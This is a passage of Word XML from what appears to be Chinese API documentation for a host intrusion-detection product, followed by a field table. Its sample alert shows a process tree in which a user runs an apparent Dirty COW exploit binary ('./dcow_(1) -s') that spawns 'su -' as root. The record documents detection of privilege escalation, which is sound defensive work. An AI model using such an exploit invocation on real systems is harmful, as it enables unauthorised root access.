      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentProcGroupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>processTreeList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ppid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "100755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>euidUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1008,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ppid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "100755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>euidUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -D "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 67477,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ppid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1008,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "100755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>euidUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: test [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]    "</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 67514,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ppid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 67477,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1000,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "100755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>euidUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>test@pts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/0     "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 67515,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ppid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 67514,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/bin/bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1000,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "100755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>euidUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "-bash "</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 67533,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ppid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 67515,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dcow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>_(1)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/home/test/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dcow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>_(1)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1000,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "100744",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>euidUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dcow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>_(1) -s "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 67537,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ppid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 67533,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1000,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "104755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>euidUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - "</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whiteRuleEffect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0383B4"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2422"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="3032"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="0625F7F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0E083A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30269F44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54B8BD22" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E3C9B7D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="26A0E085" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79A63AE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="792ECC5D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1363162E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B56A911" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="60ABDA01" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04D22503" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
